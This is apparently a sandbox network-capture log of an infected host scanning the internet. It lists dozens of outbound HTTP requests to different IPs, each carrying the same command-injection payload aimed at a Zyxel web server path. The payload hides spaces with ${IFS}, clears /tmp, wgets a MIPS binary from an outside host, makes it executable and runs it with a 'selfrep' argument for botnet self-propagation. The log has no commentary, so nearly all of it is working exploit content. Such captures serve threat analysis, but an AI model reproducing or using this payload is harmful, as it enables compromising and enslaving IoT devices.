                                      Jan 14, 2024 15:50:45.273324966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3970192.168.2.1434086113.198.151.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273359060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3971192.168.2.1450638198.0.71.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273435116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3972192.168.2.1459688209.16.200.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273497105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3973192.168.2.1448656138.94.162.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273551941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3974192.168.2.14549968.86.255.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273611069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3975192.168.2.1438016143.215.169.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273679018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3976192.168.2.145746474.238.68.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273730993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3977192.168.2.1433298223.123.242.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273792028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3978192.168.2.1440642178.240.233.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273842096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3979192.168.2.145919860.208.209.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273906946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3980192.168.2.1447768135.148.214.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273942947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3981192.168.2.14517324.22.243.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274008989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3982192.168.2.144031862.113.106.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274070024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3983192.168.2.1443094122.49.253.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274136066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3984192.168.2.1456864172.138.40.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274189949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3985192.168.2.1459196172.219.209.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274252892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3986192.168.2.1458206153.64.154.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274287939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3987192.168.2.1457556216.34.196.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274324894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3988192.168.2.1456614181.161.87.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274386883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3989192.168.2.144930891.81.200.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274441004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3990192.168.2.144107035.93.140.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274511099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3991192.168.2.1450082113.5.146.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274560928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3992192.168.2.1437006157.130.157.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274645090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3993192.168.2.1434942150.125.247.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274732113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3994192.168.2.145914847.165.22.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274769068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3995192.168.2.1459580110.14.182.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274825096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3996192.168.2.144010835.107.104.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274856091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3997192.168.2.145726820.48.10.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274893045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3998192.168.2.1454374172.69.230.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.274940968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3999192.168.2.1441114213.83.40.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275022984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4000192.168.2.144229624.137.189.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275058985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4001192.168.2.144443857.225.149.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275120020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4002192.168.2.1456304186.211.24.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275182009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4003192.168.2.1437074186.199.208.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275227070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4004192.168.2.145539665.141.206.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275265932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4005192.168.2.1449920177.225.198.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275327921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4006192.168.2.143408473.87.33.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275374889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4007192.168.2.144956818.32.208.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275432110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4008192.168.2.145099223.137.4.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275484085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4009192.168.2.1458282164.100.133.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275540113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4010192.168.2.1439776144.13.56.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275593042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4011192.168.2.1445920178.215.59.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275654078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4012192.168.2.1456710155.64.177.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275707960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4013192.168.2.1455850208.206.132.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275753021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4014192.168.2.1437438186.79.149.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275796890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4015192.168.2.1460204200.231.25.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275851965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4016192.168.2.145947845.205.130.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275898933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4017192.168.2.1437764113.149.62.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275966883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4018192.168.2.1459250172.170.175.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.275998116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4019192.168.2.1454284155.10.137.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276050091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4020192.168.2.1450306206.205.173.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276120901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4021192.168.2.14439782.32.94.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276169062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4022192.168.2.1452384201.126.213.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276221037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4023192.168.2.1449288190.252.114.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276284933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4024192.168.2.1434866100.26.110.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276324987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4025192.168.2.1454226202.78.211.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276407957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4026192.168.2.14523185.212.57.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276453972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4027192.168.2.1443352207.249.95.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276495934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4028192.168.2.1436932111.94.135.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276544094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4029192.168.2.143485867.236.73.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276588917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4030192.168.2.1443248118.15.18.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276662111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4031192.168.2.144019814.189.36.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.276715040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4032192.168.2.144920840.35.1.25443
                                      TimestampBytes transferredDirectionData
